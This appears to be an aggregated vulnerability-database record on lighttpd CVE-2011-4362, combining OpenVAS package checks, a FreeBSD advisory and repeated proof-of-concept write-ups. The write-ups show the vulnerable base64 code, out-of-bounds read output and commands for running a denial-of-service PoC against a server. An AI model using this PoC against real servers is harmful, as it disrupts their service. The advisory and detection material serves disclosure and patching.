not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70687\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2011-4362\", \"CVE-2011-3389\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-11 03:14:22 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2368-1 (lighttpd)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(5|6)\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202368-1\");\n script_tag(name:\"insight\", value:\"Several vulnerabilities have been discovered in lighttpd, a small and fast\nwebserver with minimal memory footprint.\n\nCVE-2011-4362\n\nXi Wang discovered that the base64 decoding routine which is used to\ndecode user input during an HTTP authentication, suffers of a signedness\nissue when processing user input. As a result it is possible to force\nlighttpd to perform an out-of-bounds read which results in Denial of\nService conditions.\n\nCVE-2011-3389\n\nWhen using CBC ciphers on an SSL enabled virtual host to communicate with\ncertain client, a so called BEAST attack allows man-in-the-middle\nattackers to obtain plaintext HTTP traffic via a blockwise\nchosen-boundary attack (BCBA) on an HTTPS session. Technically this is\nno lighttpd vulnerability. However, lighttpd offers a workaround to\nmitigate this problem by providing a possibility to disable CBC ciphers.\n\nThis updates includes this option by default. System administrators\nare advised to read the NEWS file of this update (as this may break older\nclients).\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.4.19+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.28-2+squeeze1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.30-1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your lighttpd packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to lighttpd\nannounced via advisory DSA 2368-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"lighttpd\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-doc\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-cml\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-magnet\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-mysql-vhost\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-trigger-b4-dl\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-webdav\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-doc\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-cml\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-magnet\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-mysql-vhost\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-trigger-b4-dl\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-webdav\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:36:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4508", "CVE-2014-2323", "CVE-2012-5533", "CVE-2013-4560", "CVE-2013-4559", "CVE-2011-4362"], "description": "Gentoo Linux Local Security Checks GLSA 201406-10", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121213", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121213", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201406-10", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201406-10.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121213\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:27:20 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201406-10\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in lighttpd. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201406-10\");\n script_cve_id(\"CVE-2011-4362\", \"CVE-2012-5533\", \"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\", \"CVE-2014-2323\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201406-10\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-servers/lighttpd\", unaffected: make_list(\"ge 1.4.35\"), vulnerable: make_list(\"lt 1.4.35\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T09:30:05", "description": "lighttpd Denial of Service Vulnerability PoC. CVE-2011-4362. Dos exploit for linux platform", "published": "2011-12-31T00:00:00", "type": "exploitdb", "title": "lighttpd Denial of Service Vulnerability PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4362"], "modified": "2011-12-31T00:00:00", "id": "EDB-ID:18295", "href": "https://www.exploit-db.com/exploits/18295/", "sourceData": "29 of November 2011 was the date of public disclosure interesting\r\nvulnerability in lighttpd server. Xi Wang discovered that mod_auth\r\nfor this server does not propely decode characters from the extended\r\nASCII table. The vulnerable code is below:\r\n\r\n\r\n\"src/http_auth.c:67\"\r\n--- CUT ---\r\nstatic const short base64_reverse_table[256] = ...;\r\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\r\n\t...\r\n\tint ch, ...;\r\n\tsize_t i;\r\n\t...\r\n\r\n\t\tch = in[i];\r\n\t\t...\r\n\t\tch = base64_reverse_table[ch];\r\n\t...\r\n}\r\n--- CUT ---\r\n\r\nBecause variable 'in' is type 'char', characters above 0x80 lead to\r\nnegative indices.\r\nThis vulnerability may lead out-of-boud read and theoretically cause\r\nSegmentation Fault (Denial of Service attack).\r\nUnfortunately I couldn't find any binaries where .rodata section before\r\nthe base64_reverse_table\r\ntable cause this situation.\r\n\r\nI have added some extra debug in the lighttpd source code to see if this\r\nvulnerability is\r\nexecuted correctly. Here is output for one of the example:\r\n\r\n--- CUT ---\r\nptr[0x9a92c48] size[0xc0] used[0x0]\r\n127(. | 0 | 0)\r\n-128(t | 1 | 0)\r\n-127(e | 2 | 1)\r\n-126(' | 3 | 2)\r\n-125(e | 4 | 3)\r\n-124(u | 5 | 3)\r\n-123(r | 6 | 4)\r\n-122(' | 7 | 5)\r\n-121(s | 8 | 6)\r\n-120(c | 9 | 6)\r\n-119(i | 10 | 7)\r\n-118(n | 11 | 8)\r\n-117(i | 12 | 9)\r\n-116( | 13 | 9)\r\n-115(a | 14 | 10)\r\n-114(t | 15 | 11)\r\n-113(. | 16 | 12)\r\n-112(e | 17 | 12)\r\n-111(u | 18 | 13)\r\n-110(r | 19 | 14)\r\n-109(' | 20 | 15)\r\n-108(f | 21 | 15)\r\n-107(i | 22 | 16)\r\n-106(e | 23 | 17)\r\n-105(: | 24 | 18)\r\n-104(= | 25 | 18)\r\n-103(o | 26 | 19)\r\n-102(t | 27 | 20)\r\n-101(o | 28 | 21)\r\n-100( | 29 | 21)\r\n-99(a | 30 | 22)\r\n-98(g | 31 | 23)\r\n-97(. | 32 | 24)\r\n-96(d | 33 | 24)\r\n-95(g | 34 | 25)\r\n-94(s | 35 | 26)\r\n-93(: | 36 | 27)\r\n-92(u | 37 | 27)\r\n-91(s | 38 | 28)\r\n-90(p | 39 | 29)\r\n-89(o | 40 | 30)\r\n-88(t | 41 | 30)\r\n-87(d | 42 | 31)\r\n-86(b | 43 | 32)\r\n-85(c | 44 | 33)\r\n-84(e | 45 | 33)\r\n-83(d | 46 | 34)\r\n-82(( | 47 | 35)\r\n-81(n | 48 | 36)\r\n-80(y | 49 | 36)\r\n-79(h | 50 | 37)\r\n-78(d | 51 | 38)\r\n-77(g | 52 | 39)\r\n-76(s | 53 | 39)\r\n-75( | 54 | 40)\r\n-74(r | 55 | 41)\r\n-73(p | 56 | 42)\r\n-72(a | 57 | 42)\r\n-71(n | 58 | 43)\r\n-70(. | 59 | 44)\r\n-69(. | 60 | 45)\r\n-68(d | 61 | 45)\r\n-67(g | 62 | 46)\r\n-66(s | 63 | 47)\r\n-65(: | 64 | 48)\r\n-64(( | 65 | 48)\r\n-63(d | 66 | 49)\r\n-62(- | 67 | 50)\r\n-61(e | 68 | 51)\r\n-60(s | 69 | 51)\r\n-59( | 70 | 52)\r\n-58(i | 71 | 53)\r\n-57(s | 72 | 54)\r\n-56(n | 73 | 54)\r\n-55( | 74 | 55)\r\n-54(i | 75 | 56)\r\n-53(l | 76 | 57)\r\n-52(. | 77 | 57)\r\n-51(. | 78 | 58)\r\n-50(k | 79 | 59)\r\n-49(0 | 80 | 60)\r\n-48(% | 81 | 60)\r\n-47(] | 82 | 61)\r\n-46(p | 83 | 62)\r\n-45(r | 84 | 63)\r\n-44(0 | 85 | 63)\r\n-43(% | 86 | 64)\r\n-42(] | 87 | 65)\r\n-41(s | 88 | 66)\r\n-40(z | 89 | 66)\r\n-39([ | 90 | 67)\r\n-38(x | 91 | 68)\r\n-37(x | 92 | 69)\r\n-36( | 93 | 69)\r\n-35(s | 94 | 70)\r\n-34(d | 95 | 71)\r\n-33(0 | 96 | 72)\r\n-32(% | 97 | 72)\r\n-31(] | 98 | 73)\r\n-30(. | 99 | 74)\r\n-29(. | 100 | 75)\r\n-28(d | 101 | 75)\r\n-27(c | 102 | 76)\r\n-26(d | 103 | 77)\r\n-25(i | 104 | 78)\r\n-24(g | 105 | 78)\r\n-23(b | 106 | 79)\r\n-22(s | 107 | 80)\r\n-21(6 | 108 | 81)\r\n-20(- | 109 | 81)\r\n-19(t | 110 | 82)\r\n-18(i | 111 | 83)\r\n-17(g | 112 | 84)\r\n-16(f | 113 | 84)\r\n-15(i | 114 | 85)\r\n-14(e | 115 | 86)\r\n-13(. | 116 | 87)\r\n-12(. | 117 | 87)\r\n-11(. | 118 | 88)\r\n-10(. | 119 | 89)\r\n-9(. | 120 | 90)\r\n-8(. | 121 | 90)\r\n-7(. | 122 | 91)\r\n-6(. | 123 | 92)\r\n-5(. | 124 | 93)\r\n-4(. | 125 | 93)\r\n-3(. | 126 | 94)\r\n-2(. | 127 | 95)\r\n-1(. | 128 | 96)\r\nk[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\nptr[0x9a92c48] size[0xc0] used[0x60]\r\nstring [.Yg.\\...n.Xt.]r.ze.....g.Y..\\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n--- CUT ---\r\n\r\nFirst column is the offset so vulnerability is executed like it should be\r\n(negative offsets). Second column is byte which is read out-of-bound.\r\n\r\nHow to run this very primitive Proof of Concept?\r\n\r\n$ gcc p_cve-2011-4362.c -o p_cve-2011-4362\r\n$ ./p_cve-2011-4362 \r\n\r\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n\r\n\tUsage: ./p_cve-2011-4362 <options>\r\n\r\n\t\tOptions:\r\n\t\t\t -v <victim>\r\n\t\t\t -p <port>\r\n\t\t\t -d <remote_dir_for_auth>\r\n\r\n$ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa\r\n\r\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n\r\n\t\t[+] Preparing arguments... OK\r\n\t\t[+] Creating socket... OK\r\n\t\t[+] Connecting to [127.0.0.1]... OK\r\n\t\t[+] Sending dirty packet... OK\r\n\r\n\t\t[+] Check the website!\r\n\r\n$ \r\n\r\nLighttpd will log this situation probably in error-log file like this:\r\n\r\n--- CUT ---\r\n..\r\n..\r\n2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in\r\n\ufffdYg\\\ufffd\ufffd\ufffdn\ufffdXt\ufffd]rze\ufffd\ufffd\ufffdgY\ufffd\ufffd\\\ufffd\ufffdYb\ufffdY(\ufffdd\ufffd\ufffdr\ufffd[Y\ufffd\ufffd\ufffd-\ufffdxi\ufffd\ufffdi\ufffdk\ufffdWp\ufffd\t]\u07f6\ufffd\ufffd\\\ufffd\ufffd\ufffd@V\ufffd\ufffdx\ufffd\ufffd\ufffdize\r\n\r\n--- CUT ---\r\n\r\nMaybe you can find vulnerable binary?\r\n\r\nBest regards,\r\nAdam 'pi3' Zabrocki\r\n\r\n\r\n--\r\nhttp://pi3.com.pl\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18295.c (p_cve-2011-4362.c)\r\nhttp://blog.pi3.com.pl/?p=277\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/18295/"}], "freebsd": [{"lastseen": "2019-05-29T18:33:54", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4362"], "description": "\nUS-CERT/NIST reports:\n\nInteger signedness error in the base64_decode function in the\n\t HTTP authentication functionality (http_auth.c) in lighttpd 1.4\n\t before 1.4.30 and 1.5 before SVN revision 2806 allows remote\n\t attackers to cause a denial of service (segmentation fault)\n\t via crafted base64 input that triggers an out-of-bounds read\n\t with a negative index.\n\n", "edition": 4, "modified": "2011-11-29T00:00:00", "published": "2011-11-29T00:00:00", "id": "C6521B04-314B-11E1-9CF4-5404A67EEF98", "href": "https://vuxml.freebsd.org/freebsd/c6521b04-314b-11e1-9cf4-5404a67eef98.html", "title": "lighttpd -- remote DoS in HTTP authentication", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:05:59", "description": "\nlighttpd - Denial of Service (PoC)", "edition": 1, "published": "2011-12-31T00:00:00", "title": "lighttpd - Denial of Service (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4362"], "modified": "2011-12-31T00:00:00", "id": "EXPLOITPACK:184DA427E35F6E3E6D5AC9CCCC72148E", "href": "", "sourceData": "29 of November 2011 was the date of public disclosure interesting\nvulnerability in lighttpd server. Xi Wang discovered that mod_auth\nfor this server does not propely decode characters from the extended\nASCII table. The vulnerable code is below:\n\n\n\"src/http_auth.c:67\"\n--- CUT ---\nstatic const short base64_reverse_table[256] = ...;\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\n\t...\n\tint ch, ...;\n\tsize_t i;\n\t...\n\n\t\tch = in[i];\n\t\t...\n\t\tch = base64_reverse_table[ch];\n\t...\n}\n--- CUT ---\n\nBecause variable 'in' is type 'char', characters above 0x80 lead to\nnegative indices.\nThis vulnerability may lead out-of-boud read and theoretically cause\nSegmentation Fault (Denial of Service attack).\nUnfortunately I couldn't find any binaries where .rodata section before\nthe base64_reverse_table\ntable cause this situation.\n\nI have added some extra debug in the lighttpd source code to see if this\nvulnerability is\nexecuted correctly. Here is output for one of the example:\n\n--- CUT ---\nptr[0x9a92c48] size[0xc0] used[0x0]\n127(. | 0 | 0)\n-128(t | 1 | 0)\n-127(e | 2 | 1)\n-126(' | 3 | 2)\n-125(e | 4 | 3)\n-124(u | 5 | 3)\n-123(r | 6 | 4)\n-122(' | 7 | 5)\n-121(s | 8 | 6)\n-120(c | 9 | 6)\n-119(i | 10 | 7)\n-118(n | 11 | 8)\n-117(i | 12 | 9)\n-116( | 13 | 9)\n-115(a | 14 | 10)\n-114(t | 15 | 11)\n-113(. | 16 | 12)\n-112(e | 17 | 12)\n-111(u | 18 | 13)\n-110(r | 19 | 14)\n-109(' | 20 | 15)\n-108(f | 21 | 15)\n-107(i | 22 | 16)\n-106(e | 23 | 17)\n-105(: | 24 | 18)\n-104(= | 25 | 18)\n-103(o | 26 | 19)\n-102(t | 27 | 20)\n-101(o | 28 | 21)\n-100( | 29 | 21)\n-99(a | 30 | 22)\n-98(g | 31 | 23)\n-97(. | 32 | 24)\n-96(d | 33 | 24)\n-95(g | 34 | 25)\n-94(s | 35 | 26)\n-93(: | 36 | 27)\n-92(u | 37 | 27)\n-91(s | 38 | 28)\n-90(p | 39 | 29)\n-89(o | 40 | 30)\n-88(t | 41 | 30)\n-87(d | 42 | 31)\n-86(b | 43 | 32)\n-85(c | 44 | 33)\n-84(e | 45 | 33)\n-83(d | 46 | 34)\n-82(( | 47 | 35)\n-81(n | 48 | 36)\n-80(y | 49 | 36)\n-79(h | 50 | 37)\n-78(d | 51 | 38)\n-77(g | 52 | 39)\n-76(s | 53 | 39)\n-75( | 54 | 40)\n-74(r | 55 | 41)\n-73(p | 56 | 42)\n-72(a | 57 | 42)\n-71(n | 58 | 43)\n-70(. | 59 | 44)\n-69(. | 60 | 45)\n-68(d | 61 | 45)\n-67(g | 62 | 46)\n-66(s | 63 | 47)\n-65(: | 64 | 48)\n-64(( | 65 | 48)\n-63(d | 66 | 49)\n-62(- | 67 | 50)\n-61(e | 68 | 51)\n-60(s | 69 | 51)\n-59( | 70 | 52)\n-58(i | 71 | 53)\n-57(s | 72 | 54)\n-56(n | 73 | 54)\n-55( | 74 | 55)\n-54(i | 75 | 56)\n-53(l | 76 | 57)\n-52(. | 77 | 57)\n-51(. | 78 | 58)\n-50(k | 79 | 59)\n-49(0 | 80 | 60)\n-48(% | 81 | 60)\n-47(] | 82 | 61)\n-46(p | 83 | 62)\n-45(r | 84 | 63)\n-44(0 | 85 | 63)\n-43(% | 86 | 64)\n-42(] | 87 | 65)\n-41(s | 88 | 66)\n-40(z | 89 | 66)\n-39([ | 90 | 67)\n-38(x | 91 | 68)\n-37(x | 92 | 69)\n-36( | 93 | 69)\n-35(s | 94 | 70)\n-34(d | 95 | 71)\n-33(0 | 96 | 72)\n-32(% | 97 | 72)\n-31(] | 98 | 73)\n-30(. | 99 | 74)\n-29(. | 100 | 75)\n-28(d | 101 | 75)\n-27(c | 102 | 76)\n-26(d | 103 | 77)\n-25(i | 104 | 78)\n-24(g | 105 | 78)\n-23(b | 106 | 79)\n-22(s | 107 | 80)\n-21(6 | 108 | 81)\n-20(- | 109 | 81)\n-19(t | 110 | 82)\n-18(i | 111 | 83)\n-17(g | 112 | 84)\n-16(f | 113 | 84)\n-15(i | 114 | 85)\n-14(e | 115 | 86)\n-13(. | 116 | 87)\n-12(. | 117 | 87)\n-11(. | 118 | 88)\n-10(. | 119 | 89)\n-9(. | 120 | 90)\n-8(. | 121 | 90)\n-7(. | 122 | 91)\n-6(. | 123 | 92)\n-5(. | 124 | 93)\n-4(. | 125 | 93)\n-3(. | 126 | 94)\n-2(. | 127 | 95)\n-1(. | 128 | 96)\nk[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\nptr[0x9a92c48] size[0xc0] used[0x60]\nstring [.Yg.\\...n.Xt.]r.ze.....g.Y..\\..Yb.Y(..d..r.[..Y...-.xi..i.]\n--- CUT ---\n\nFirst column is the offset so vulnerability is executed like it should be\n(negative offsets). Second column is byte which is read out-of-bound.\n\nHow to run this very primitive Proof of Concept?\n\n$ gcc p_cve-2011-4362.c -o p_cve-2011-4362\n$ ./p_cve-2011-4362 \n\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\n]=- :::...\n\n\tUsage: ./p_cve-2011-4362 <options>\n\n\t\tOptions:\n\t\t\t -v <victim>\n\t\t\t -p <port>\n\t\t\t -d <remote_dir_for_auth>\n\n$ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa\n\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\n]=- :::...\n\n\t\t[+] Preparing arguments... OK\n\t\t[+] Creating socket... OK\n\t\t[+] Connecting to [127.0.0.1]... OK\n\t\t[+] Sending dirty packet... OK\n\n\t\t[+] Check the website!\n\n$ \n\nLighttpd will log this situation probably in error-log file like this:\n\n--- CUT ---\n..\n..\n2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in\n\ufffdYg\\\ufffd\ufffd\ufffdn\ufffdXt\ufffd]rze\ufffd\ufffd\ufffdgY\ufffd\ufffd\\\ufffd\ufffdYb\ufffdY(\ufffdd\ufffd\ufffdr\ufffd[Y\ufffd\ufffd\ufffd-\ufffdxi\ufffd\ufffdi\ufffdk\ufffdWp\ufffd\t]\u07f6\ufffd\ufffd\\\ufffd\ufffd\ufffd@V\ufffd\ufffdx\ufffd\ufffd\ufffdize\n\n--- CUT ---\n\nMaybe you can find vulnerable binary?\n\nBest regards,\nAdam 'pi3' Zabrocki\n\n\n--\nhttp://pi3.com.pl\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18295.c (p_cve-2011-4362.c)\nhttp://blog.pi3.com.pl/?p=277", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "zdt": [{"lastseen": "2018-01-03T13:04:46", "description": "Exploit for linux platform in category dos / poc", "edition": 2, "published": "2011-12-31T00:00:00", "type": "zdt", "title": "Lighttpd Proof of Concept code for CVE-2011-4362", "bulletinFamily": "exploit", "cvelist": [], "modified": "2011-12-31T00:00:00", "id": "1337DAY-ID-17319", "href": "https://0day.today/exploit/description/17319", "sourceData": "/*\r\n * Primitive Lighttpd Proof of Concept code for CVE-2011-4362 vulnerability discovered by Xi Wang\r\n *\r\n * Here the vulnerable code (src/http_auth.c:67)\r\n *\r\n * --- CUT ---\r\n * static const short base64_reverse_table[256] = {\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x00 - 0x0F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x10 - 0x1F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, /* 0x20 - 0x2F\r\n * 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, /* 0x30 - 0x3F\r\n * -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, /* 0x40 - 0x4F\r\n * 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, /* 0x50 - 0x5F\r\n * -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, /* 0x60 - 0x6F\r\n * 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1, /* 0x70 - 0x7F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x80 - 0x8F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x90 - 0x9F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xA0 - 0xAF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xB0 - 0xBF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xC0 - 0xCF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xD0 - 0xDF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xE0 - 0xEF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xF0 - 0xFF\r\n * };\r\n *\r\n * static unsigned char * base64_decode(buffer *out, const char *in) {\r\n * \t...\r\n * \tint ch, ...;\r\n * \tsize_t i;\r\n * \t...\r\n * \t\r\n * \t\tch = in[i];\r\n * \t\t...\r\n * \t\tch = base64_reverse_table[ch];\r\n * \t...\r\n * }\r\n * --- CUT ---\r\n *\r\n * Because variable 'in' is type 'char', characters above 0x80 lead to negative indices.\r\n * This vulnerability may lead out-of-boud read and theoretically cause Segmentation Fault\r\n * (Denial of Service attack). Unfortunately I couldn't find any binaries where .rodata\r\n * section before the base64_reverse_table table cause this situation.\r\n *\r\n * I have added some extra debug in the lighttpd source code to see if this vulnerability is\r\n * executed correctly. Here is output for one of the example:\r\n *\r\n * --- CUT ---\r\n * ptr[0x9a92c48] size[0xc0] used[0x0]\r\n * 127(. | 0 | 0)\r\n * -128(t | 1 | 0)\r\n * -127(e | 2 | 1)\r\n * -126(' | 3 | 2)\r\n * -125(e | 4 | 3)\r\n * -124(u | 5 | 3)\r\n * -123(r | 6 | 4)\r\n * -122(' | 7 | 5)\r\n * -121(s | 8 | 6)\r\n * -120(c | 9 | 6)\r\n * -119(i | 10 | 7)\r\n * -118(n | 11 | 8)\r\n * -117(i | 12 | 9)\r\n * -116( | 13 | 9)\r\n * -115(a | 14 | 10)\r\n * -114(t | 15 | 11)\r\n * -113(. | 16 | 12)\r\n * -112(e | 17 | 12)\r\n * -111(u | 18 | 13)\r\n * -110(r | 19 | 14)\r\n * -109(' | 20 | 15)\r\n * -108(f | 21 | 15)\r\n * -107(i | 22 | 16)\r\n * -106(e | 23 | 17)\r\n * -105(: | 24 | 18)\r\n * -104(= | 25 | 18)\r\n * -103(o | 26 | 19)\r\n * -102(t | 27 | 20)\r\n * -101(o | 28 | 21)\r\n * -100( | 29 | 21)\r\n * -99(a | 30 | 22)\r\n * -98(g | 31 | 23)\r\n * -97(. | 32 | 24)\r\n * -96(d | 33 | 24)\r\n * -95(g | 34 | 25)\r\n * -94(s | 35 | 26)\r\n * -93(: | 36 | 27)\r\n * -92(u | 37 | 27)\r\n * -91(s | 38 | 28)\r\n * -90(p | 39 | 29)\r\n * -89(o | 40 | 30)\r\n * -88(t | 41 | 30)\r\n * -87(d | 42 | 31)\r\n * -86(b | 43 | 32)\r\n * -85(c | 44 | 33)\r\n * -84(e | 